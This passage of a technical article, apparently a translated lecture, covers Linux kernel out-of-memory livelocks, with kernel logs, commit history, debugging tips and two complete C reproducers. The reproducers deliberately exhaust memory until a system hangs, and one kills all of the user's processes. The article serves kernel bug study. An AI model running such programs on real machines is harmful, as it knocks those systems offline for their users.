schedule_timeout+0x11e/0x1c0 [ 1964.314384] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1964.314385] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1964.314386] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1964.314387] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1964.314389] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1964.314390] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1964.314391] [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80 [ 1964.314392] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1964.314393] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1964.314394] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1964.314395] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1964.314396] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1964.314397] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1964.314400] [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0 [ 1964.314402] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1964.314404] [<ffffffff812a3b2d>] ? 
bio_alloc_bioset+0x20d/0x2d0 [ 1964.314404] [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180 [ 1964.314405] [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130 [ 1964.314407] [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160 [ 1964.314408] [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0 [ 1964.314412] [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod] [ 1964.314414] [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom] [ 1964.314415] [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod] [ 1964.314417] [<ffffffff812bb6db>] disk_check_events+0x5b/0x150 [ 1964.314418] [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20 [ 1964.314420] [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400 [ 1964.314421] [<ffffffff8108e291>] ? process_one_work+0x141/0x400 [ 1964.314422] [<ffffffff8108e676>] worker_thread+0x126/0x490 [ 1964.314424] [<ffffffff8108e550>] ? process_one_work+0x400/0x400 [ 1964.314433] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1964.314435] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1964.314436] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 [ 1964.314503] Mem-Info: [ 1964.314507] active_anon:197951 inactive_anon:2919 isolated_anon:0 [ 1964.314507] active_file:585 inactive_file:1081 isolated_file:23 [ 1964.314507] unevictable:0 dirty:0 writeback:204 unstable:0 [ 1964.314507] slab_reclaimable:1715 slab_unreclaimable:10724 [ 1964.314507] mapped:1114 shmem:3239 pagetables:5438 bounce:0 [ 1964.314507] free:12237 free_pcp:73 free_cma:0 [ 1964.314512] Node 0 DMA free:4580kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:716kB kernel_stack:368kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1964.314514] lowmem_reserve[]: 0 936 936 936 [ 1964.314518] Node 0 DMA32 free:44368kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:2328kB inactive_file:4304kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:4444kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42180kB kernel_stack:19552kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:292kB local_pcp:36kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 1964.314519] lowmem_reserve[]: 0 0 0 0 [ 1964.314526] Node 0 DMA: 37*4kB (U) 30*8kB (UM) 18*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4580kB [ 1964.314530] Node 0 DMA32: 1384*4kB (UE) 1000*8kB (UE) 669*16kB (UME) 335*32kB (UME) 113*64kB (UME) 17*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44368kB [ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 1964.314532] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 1964.314533] 4943 total pagecache pages [ 1964.314534] 0 pages in swap cache [ 1964.314535] Swap cache stats: add 0, delete 0, find 0/0 [ 1964.314535] Free swap = 0kB [ 1964.314536] Total swap = 0kB [ 1964.314547] 262013 pages RAM [ 1964.314547] 0 pages HighMem/MovableOnly [ 1964.314548] 12770 pages reserved [ 1964.314548] 0 pages cma reserved [ 1964.314548] 0 pages hwpoisoned [ 1964.314549] Showing busy workqueues and worker pools: [ 1964.314572] workqueue events: flags=0x0 [ 1964.314617] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.314634] pending: vmw_fb_dirty_flush [vmwgfx] [ 1964.314673] workqueue events_power_efficient: flags=0x80 [ 1964.314703] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.314706] in-flight: 1882:fb_flashcursor [ 1964.314725] workqueue events_freezable_power_: flags=0x84 [ 1964.314744] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.314748] in-flight: 4484:disk_events_workfn [ 1964.314794] workqueue writeback: flags=0x4e [ 1964.314796] pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256 [ 1964.314799] in-flight: 73:wb_workfn wb_workfn [ 1964.315291] workqueue xfs-eofblocks/sda1: flags=0xc [ 1964.315314] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1964.315322] in-flight: 2125:xfs_eofblocks_worker [xfs] [ 1964.315336] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 2396 [ 1964.315395] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6 (...snipped...) [ 1964.320659] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275 ---------- Example output end ----------
The output above includes messages from the kmallocwd kernel thread. However, since kmallocwd has not been accepted into the mainline kernel yet, no messages will be printed when a system actually hits this situation (unless both /proc/sys/kernel/hung_task_timeout_secs and /proc/sys/kernel/hung_task_warnings are set to non-zero values).
I have not received a response about this problem from Michal Hocko, who is too busy with OOM killer / OOM reaper related fixes. I asked when we will be able to start handling this problem, but since this problem has deep roots, it is difficult to give an estimated time.
Allocation requests made in order to reclaim memory are allowed to allocate from the memory reserves. Therefore, not only threads with the TIF_MEMDIE flag set but also threads performing filesystem writeback can allocate from the memory reserves. But since there is no means of limiting the amount of memory allocated from the memory reserves, casually allocating from them results in depletion of the reserves. As a result, when examining the behavior of an OOM situation, behavior which is harmless under normal conditions can make the situation worse under an OOM situation.
The following is an example where the memory reserves are depleted by allocation requests issued for filesystem writeback (which is triggered from ordinary memory allocation) when an OOM livelock situation occurs while writing to a file.
---------- oom-tester16.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/prctl.h>
#include <signal.h>

static char buffer[4096] = { };

static int file_io(void *unused)
{
    const int fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600);
    sleep(2);
    while (write(fd, buffer, sizeof(buffer)) > 0);
    close(fd);
    return 0;
}

int main(int argc, char *argv[])
{
    int i;
    if (chdir("/tmp"))
        return 1;
    for (i = 0; i < 64; i++)
        if (fork() == 0) {
            static cpu_set_t set = { { 1 } }; /* Run only on CPU 0. */
            const int fd = open("/proc/self/oom_score_adj", O_WRONLY);
            /* Make this process a preferred OOM victim. */
            write(fd, "1000", 4);
            close(fd);
            sched_setaffinity(0, sizeof(set), &set);
            snprintf(buffer, sizeof(buffer), "file_io.%02u", i);
            prctl(PR_SET_NAME, (unsigned long) buffer, 0, 0, 0);
            for (i = 0; i < 16; i++)
                clone(file_io, malloc(1024) + 1024, CLONE_VM, NULL);
            while (1)
                pause();
        }
    { /* A dummy process for invoking the OOM killer. */
        char *buf = NULL;
        unsigned long i;
        unsigned long size = 0;
        prctl(PR_SET_NAME, (unsigned long) "memeater", 0, 0, 0);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
            char *cp = realloc(buf, size);
            if (!cp) {
                size >>= 1;
                break;
            }
            buf = cp;
        }
        sleep(4);
        for (i = 0; i < size; i += 4096)
            buf[i] = '\0'; /* Will cause OOM due to overcommit */
    }
    kill(-1, SIGKILL);
    return * (char *) NULL; /* Not reached. */
}
---------- oom-tester16.c ----------
---------- Example output start ---------- [ 59.562581] Mem-Info: [ 59.563935] active_anon:289393 inactive_anon:2093 isolated_anon:29 [ 59.563935] active_file:10838 inactive_file:113013 isolated_file:859 [ 59.563935] unevictable:0 dirty:108531 writeback:5308 unstable:0 [ 59.563935] slab_reclaimable:5526 slab_unreclaimable:7077 [ 59.563935] mapped:9970 shmem:2159 pagetables:2387 bounce:0 [ 59.563935] free:3042 free_pcp:0 free_cma:0 [ 59.574558] Node 0 DMA free:6968kB min:44kB low:52kB high:64kB active_anon:6056kB inactive_anon:176kB active_file:712kB inactive_file:744kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:208kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9708 all_unreclaimable? yes [ 59.585464] lowmem_reserve[]: 0 1732 1732 1732 [ 59.587123] Node 0 DMA32 free:5200kB min:5200kB low:6500kB high:7800kB active_anon:1151516kB inactive_anon:8196kB active_file:42640kB inactive_file:451076kB unevictable:0kB isolated(anon):116kB isolated(file):3564kB present:2080640kB managed:1775332kB mlocked:0kB dirty:433368kB writeback:21232kB mapped:39144kB shmem:8452kB slab_reclaimable:22056kB slab_unreclaimable:28100kB kernel_stack:20976kB pagetables:9404kB unstable:0kB bounce:0kB free_pcp:120kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2701604 all_unreclaimable? no [ 59.599649] lowmem_reserve[]: 0 0 0 0 [ 59.601431] Node 0 DMA: 25*4kB (UME) 16*8kB (UME) 3*16kB (UE) 5*32kB (UME) 2*64kB (UM) 2*128kB (ME) 2*256kB (ME) 1*512kB (E) 1*1024kB (E) 2*2048kB (ME) 0*4096kB = 6964kB [ 59.606509] Node 0 DMA32: 925*4kB (UME) 140*8kB (UME) 5*16kB (ME) 5*32kB (M) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 5060kB [ 59.610415] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 59.612879] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 59.615308] 126847 total pagecache pages [ 59.616921] 0 pages in swap cache [ 59.618475] Swap cache stats: add 0, delete 0, find 0/0 [ 59.620268] Free swap = 0kB [ 59.621650] Total swap = 0kB [ 59.623011] 524157 pages RAM [ 59.624365] 0 pages HighMem/MovableOnly [ 59.625893] 76348 pages reserved [ 59.627506] 0 pages hwpoisoned [ 59.628838] Out of memory: Kill process 4450 (file_io.00) score 998 or sacrifice child [ 59.631071] Killed process 4450 (file_io.00) total-vm:4308kB, anon-rss:100kB, file-rss:1184kB, shmem-rss:0kB [ 61.526353] kthreadd: page allocation failure: order:0, mode:0x2200020 [ 61.527976] file_io.00: page allocation failure: order:0, mode:0x2200020 [ 61.527978] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45 [ 61.527979] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 61.527981] 0000000000000086 000000000005bb2d ffff88006cc5b588 ffffffff812a4d65 [ 61.527982] 0000000002200020 0000000000000000 ffff88006cc5b618 ffffffff81106dc7 [ 61.527983] 0000000000000000 ffffffffffffffff 00ff880000000000 ffff880000000004 [ 61.527983] Call Trace: [ 61.528009] [<ffffffff812a4d65>] dump_stack+0x4d/0x68 [ 61.528012] [<ffffffff81106dc7>] warn_alloc_failed+0xf7/0x150 [ 61.528014] [<ffffffff81109e3f>] __alloc_pages_nodemask+0x23f/0xa60 [ 61.528016] [<ffffffff81137770>] ? page_check_address_transhuge+0x350/0x350 [ 61.528018] [<ffffffff8111327d>] ? 
page_evictable+0xd/0x40 [ 61.528019] [<ffffffff8114d927>] alloc_pages_current+0x87/0x110 [ 61.528021] [<ffffffff81155181>] new_slab+0x3a1/0x440 [ 61.528023] [<ffffffff81156fdf>] ___slab_alloc+0x3cf/0x590 [ 61.528024] [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90 [ 61.528027] [<ffffffff815a7f68>] ? preempt_schedule_common+0x1f/0x37 [ 61.528028] [<ffffffff815a7f9f>] ? preempt_schedule+0x1f/0x30 [ 61.528030] [<ffffffff81001012>] ? ___preempt_schedule+0x12/0x14 [ 61.528030] [<ffffffff811a0999>] ? wb_start_writeback+0x39/0x90 [ 61.528032] [<ffffffff81175536>] __slab_alloc.isra.64+0x18/0x1d [ 61.528033] [<ffffffff8115778c>] kmem_cache_alloc+0x11c/0x150 [ 61.528034] [<ffffffff811a0999>] wb_start_writeback+0x39/0x90 [ 61.528035] [<ffffffff811a0d9f>] wakeup_flusher_threads+0x7f/0xf0 [ 61.528036] [<ffffffff81115ac9>] do_try_to_free_pages+0x1f9/0x410 [ 61.528037] [<ffffffff81115d74>] try_to_free_pages+0x94/0xc0 [ 61.528038] [<ffffffff8110a166>] __alloc_pages_nodemask+0x566/0xa60 [ 61.528040] [<ffffffff81200878>] ? xfs_bmapi_read+0x208/0x2f0 [ 61.528041] [<ffffffff8114d927>] alloc_pages_current+0x87/0x110 [ 61.528042] [<ffffffff8110092f>] __page_cache_alloc+0xaf/0xc0 [ 61.528043] [<ffffffff811011e8>] pagecache_get_page+0x88/0x260 [ 61.528044] [<ffffffff81101d31>] grab_cache_page_write_begin+0x21/0x40 [ 61.528046] [<ffffffff81222c9f>] xfs_vm_write_begin+0x2f/0xf0 [ 61.528047] [<ffffffff810b14be>] ? current_fs_time+0x1e/0x30 [ 61.528048] [<ffffffff81101eca>] generic_perform_write+0xca/0x1c0 [ 61.528050] [<ffffffff8107c390>] ? wake_up_process+0x10/0x20 [ 61.528051] [<ffffffff8122e01c>] xfs_file_buffered_aio_write+0xcc/0x1f0 [ 61.528052] [<ffffffff81079037>] ? finish_task_switch+0x77/0x280 [ 61.528053] [<ffffffff8122e1c4>] xfs_file_write_iter+0x84/0x140 [ 61.528054] [<ffffffff811777a7>] __vfs_write+0xc7/0x100 [ 61.528055] [<ffffffff811784cd>] vfs_write+0x9d/0x190 [ 61.528056] [<ffffffff810010a1>] ? do_audit_syscall_entry+0x61/0x70 [ 61.528057] [<ffffffff811793c0>] SyS_write+0x50/0xc0 [ 61.528059] [<ffffffff815ab4d7>] entry_SYSCALL_64_fastpath+0x12/0x6a [ 61.528059] Mem-Info: [ 61.528062] active_anon:293335 inactive_anon:2093 isolated_anon:0 [ 61.528062] active_file:10829 inactive_file:110045 isolated_file:32 [ 61.528062] unevictable:0 dirty:109275 writeback:822 unstable:0 [ 61.528062] slab_reclaimable:5489 slab_unreclaimable:10070 [ 61.528062] mapped:9999 shmem:2159 pagetables:2420 bounce:0 [ 61.528062] free:3 free_pcp:0 free_cma:0 [ 61.528065] Node 0 DMA free:12kB min:44kB low:52kB high:64kB active_anon:6060kB inactive_anon:176kB active_file:708kB inactive_file:756kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:756kB writeback:0kB mapped:736kB shmem:184kB slab_reclaimable:48kB slab_unreclaimable:7160kB kernel_stack:160kB pagetables:144kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:9844 all_unreclaimable? yes [ 61.528066] lowmem_reserve[]: 0 1732 1732 1732 [ 61.528068] Node 0 DMA32 free:0kB min:5200kB low:6500kB high:7800kB active_anon:1167280kB inactive_anon:8196kB active_file:42608kB inactive_file:439424kB unevictable:0kB isolated(anon):0kB isolated(file):128kB present:2080640kB managed:1775332kB mlocked:0kB dirty:436344kB writeback:3288kB mapped:39260kB shmem:8452kB slab_reclaimable:21908kB slab_unreclaimable:33120kB kernel_stack:20976kB pagetables:9536kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:11073180 all_unreclaimable? 
yes [ 61.528069] lowmem_reserve[]: 0 0 0 0 [ 61.528072] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 61.528074] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 61.528076] 123086 total pagecache pages [ 61.528076] 0 pages in swap cache [ 61.528077] Swap cache stats: add 0, delete 0, find 0/0 [ 61.528077] Free swap = 0kB [ 61.528077] Total swap = 0kB [ 61.528077] 524157 pages RAM [ 61.528078] 0 pages HighMem/MovableOnly [ 61.528078] 76348 pages reserved [ 61.528078] 0 pages hwpoisoned [ 61.528079] SLUB: Unable to allocate memory on node -1 (gfp=0x2088020) [ 61.528080] cache: kmalloc-64, object size: 64, buffer size: 64, default order: 0, min order: 0 [ 61.528080] node 0: slabs: 3218, objs: 205952, free: 0 [ 61.528085] file_io.00: page allocation failure: order:0, mode:0x2200020 [ 61.528086] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45 ---------- Example output end ----------
As an interim fix, we made sure for now that the memory reserves are not depleted, via commit 78ebc2f7146156f4 ("mm,writeback: don't use memory reserves for wb_start_writeback").
It was lucky that this problem was found before the OOM reaper was accepted, for if the OOM reaper had prevented the OOM livelock situation from occurring, we could not have reproduced this problem, and it would have been considered non-existent. Regarding problems caused by the Linux kernel's memory management subsystem, you are especially strongly expected to identify the culprit and hand over the evidence by yourself, so we cannot expect unreproducible problems to be addressed.
There was a bug in down_write_killable(), a variant of down_write() which can be interrupted by a SIGKILL signal and which was introduced in order to reduce the possibility of the OOM reaper failing to reclaim memory; the bug resulted in an OOM livelock situation. Nobody noticed this bug for one month after the patch was accepted into linux-next, which was (at that moment) the development tree heading towards Linux 4.7-rc1. (Once again, the OOM situation is simply not tested enough.)
---------- torture6.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/wait.h>

static int memory_eater(void *unused)
{
    char *buf = NULL;
    unsigned long size = 0;
    /* Endlessly grow and shrink a buffer between 4KB and 1MB. */
    while (1) {
        char *tmp = realloc(buf, size + 4096);
        if (!tmp)
            break;
        buf = tmp;
        buf[size] = 0;
        size += 4096;
        size %= 1048576;
    }
    kill(getpid(), SIGKILL);
    return 0;
}

static void child(void)
{
    char *stack = malloc(4096 * 2);
    char from[128] = { };
    char to[128] = { };
    const pid_t pid = getpid();
    unsigned char prev = 0;
    int fd = open("/proc/self/oom_score_adj", O_WRONLY);
    /* Make this process a preferred OOM victim. */
    write(fd, "1000", 4);
    close(fd);
    snprintf(from, sizeof(from), "tgid=%u", pid);
    prctl(PR_SET_NAME, (unsigned long) from, 0, 0, 0);
    srand(pid);
    snprintf(from, sizeof(from), "file.%u-0", pid);
    fd = open(from, O_WRONLY | O_CREAT, 0600);
    if (fd == EOF)
        _exit(1);
    if (clone(memory_eater, stack + 4096,
              CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
        _exit(1);
    /* Keep renaming the file and writing to it to generate fs activity. */
    while (1) {
        const unsigned char next = rand();
        snprintf(from, sizeof(from), "file.%u-%u", pid, prev);
        snprintf(to, sizeof(to), "file.%u-%u", pid, next);
        prev = next;
        rename(from, to);
        write(fd, "", 1);
    }
    _exit(0);
}

int main(int argc, char *argv[])
{
    if (chdir("/tmp"))
        return 1;
    if (fork() == 0) {
        char *buf = NULL;
        unsigned long size;
        unsigned long i;
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
            char *cp = realloc(buf, size);
            if (!cp) {
                size >>= 1;
                break;
            }
            buf = cp;
        }
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096)
            buf[i] = 0;
        while (1)
            pause();
    } else {
        int children = 1024;
        while (1) {
            while (children > 0) {
                switch (fork()) {
                case 0:
                    child();
                case -1:
                    sleep(1);
                    break;
                default:
                    children--;
                }
            }
            wait(NULL);
            children++;
        }
    }
    return 0;
}
---------- torture6.c ----------
This bug was fixed by commit 04cafed7fc19a801 ("locking/rwsem: Fix down_write_killable()").
Since swapping out is considered an operation for making free memory, allocation requests issued while performing swap-out are allowed to allocate from the memory reserves.
Linux 4.6 and later kernels include commit f9054c70d28bc214 ("mm, mempool: only set __GFP_NOMEMALLOC if there are free elements") in order to prevent threads with the TIF_MEMDIE flag set from being blocked forever inside mempool_alloc(). But this patch was not prepared for being called from memory reclaim operations. As a result, when dm-crypt is used for the swap device, the system became unresponsive due to depletion of the memory reserves, because dm-crypt allocates memory in order to encrypt the very data which is supposed to be swapped out to make free memory.
Since the OOM reaper was added in Linux 4.6, and we are currently trying to prove that the OOM livelock situation cannot occur as long as the OOM killer can be invoked, this patch was reverted by commit 4e390b2b2f34b8da ("Revert "mm, mempool: only set __GFP_NOMEMALLOC if there are free elements"").
The possibility of the system hanging up when the OOM killer can be invoked has been reduced. But the possibility of the system hanging up without the OOM killer being invoked still remains. Therefore, my conclusion from this experience is that the user's expectation that "the OOM killer is invoked to resolve an out of memory situation whenever the system enters one" is currently an illusion.
Many years ago, when SELinux started being enabled in enforcing mode by default, there arose a tendency to "suspect SELinux first when something goes wrong with an application's behavior".
When SELinux is suspected, we can test whether the problem goes away by disabling SELinux. But when the behavior of the memory management subsystem under out of memory conditions is the cause, we cannot test whether the problem goes away by not using the memory management subsystem.
Since the behavior of the memory management subsystem under out of memory conditions depends on system configuration, usage, and timing, it is impossible to test all possibilities at the development stage. We need feedback when a problem occurs in an end user's environment. But since the memory management subsystem gives users no way to tell that "something unexpected is occurring" (in other words, there is no mechanism for proving that the memory management subsystem is innocent), it is impossible even to suspect the memory management subsystem, let alone get feedback from end users.
I'm sorry for the system administrators and the technical staff at support centers who are troubled by system hangups, but the situation of encountering unsolvable challenges, as in the CTF games, will continue for the time being.
The memory management subsystem in the Linux kernel seems to be a mass of optimism and heuristics. Never swallow comments in the source code and/or change logs whole. Suspect, suspect and suspect. What are the preconditions? What worst case is the code prepared for? There is no shortage of things to suspect.
The "too small to fail" memory-allocation rule still exists. Also, there are "not too small" problems which cannot fail. In this lecture, you glimpsed the dark side of Linux kernel's memory management. Why don't you challenge these horribly difficult problems?
At the LSF/MM summit held this April, there seems to have been a discussion about an overhaul of the GFP flags (which are the cause of these games we cannot win). Since I am neither a memory management person nor a filesystem person, I do not understand the details of the discussion (i.e. the behavior inside the respective subsystems). But it seems to me that the discussion is revealing how poorly knowledge is shared between the provider side and the consumer side. It is a pity that workarounds which could be backported to older kernels are completely ignored, but the Linux kernel developers' community has started taking on the challenge.
In the real world, I feel that rigid organizations are failing more and more to think about other divisions. Even within the same division, I feel that the "that is not my role!" attitude is spreading as an excuse for ducking issues. And as if to add insult to injury, I feel that, in the name of security, the trend towards forbidding organizations from even sharing and thinking about problems is getting stronger.
I believe that, just as the filesystem developers and the memory management developers started discussions for solving problems, we need to provide mental space for unconstrained communication in the real world. My view is that "thinking about various possibilities" (a bit of imagination and attentiveness) moves things forward, not towards a favorable settlement in daily negotiations, but towards solving long-standing problems.
Regarding Linux systems running as guests in virtualized environments (e.g. KVM and VMware), you can obtain a memory dump of the guest using the hypervisor's functionality (e.g. virsh dump --memory-only for libvirt-managed KVM guests). Since taking a memory dump does not involve a kernel panic, you can obtain multiple memory dumps and check how the situation changes over time. Therefore, when your Linux guest system hangs up, you can increase the possibility of solving the problem by taking the guest's memory dump multiple times before rebooting the guest.
The Linux kernel does not print any messages when a hangup is caused by the behavior of the memory management subsystem. Therefore, you need to obtain information using e.g. memory dumps and/or SysRq.
By configuring a serial console and/or netconsole, you can check memory usage (e.g. via the SysRq-m output). If free: is below min:, an OOM livelock situation is suspected.
By configuring a serial console and/or netconsole, you can check which threads are doing memory allocation (e.g. via the SysRq-t output). If many threads report a "__alloc_pages_nodemask" line in their backtraces, an OOM livelock situation is suspected. A small helper for triggering both checks is sketched below.
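Both checks can be triggered by hand via SysRq. The following is a minimal sketch (this helper is not part of the original reproducers, and the file name is my own choice); it assumes that SysRq is enabled via /proc/sys/kernel/sysrq and that the system is still responsive enough to run a program.
---------- sysrq-check.c ----------
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
    const int fd = open("/proc/sysrq-trigger", O_WRONLY);
    if (fd == -1)
        return 1;
    write(fd, "m", 1); /* SysRq-m: dump memory usage (compare free: with min:). */
    sleep(1);
    write(fd, "t", 1); /* SysRq-t: dump all threads (look for __alloc_pages_nodemask). */
    close(fd);
    return 0;
}
---------- sysrq-check.c ----------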
Since the default value of /proc/sys/kernel/hung_task_warnings is 10, it is common for the value to drop to 0 before the actual problem occurs, and thus for the messages at the moment of the actual problem to go uncaptured.
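As a minimal sketch (the file name and the values are arbitrary choices of mine, not from the original text), you could raise the limits before trying to reproduce a problem so that the warnings are not exhausted beforehand:
---------- hung-task-setup.c ----------
#include <stdio.h>

/* Writes one value to one /proc file; returns 0 on success. */
static int write_value(const char *path, const char *value)
{
    FILE *fp = fopen(path, "w");
    if (!fp)
        return -1;
    fprintf(fp, "%s\n", value);
    return fclose(fp);
}

int main(int argc, char *argv[])
{
    /* Check for hung tasks every 120 seconds (commonly the default). */
    write_value("/proc/sys/kernel/hung_task_timeout_secs", "120");
    /* Allow many warnings instead of the default 10. */
    write_value("/proc/sys/kernel/hung_task_warnings", "10000");
    return 0;
}
---------- hung-task-setup.c ----------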
Some watchdogs allow you to configure the action to take upon timeout (e.g. setting /proc/sys/kernel/hung_task_panic to 1 makes the kernel panic when the hung task watchdog fires). You can increase the possibility of solving the problem by taking a kdump before rebooting when your system hangs up.
As I wrote in my OSS column series "To invite a peaceful night" (written in Japanese), I think that whether you have prepared and practiced before you encounter problems makes the big difference.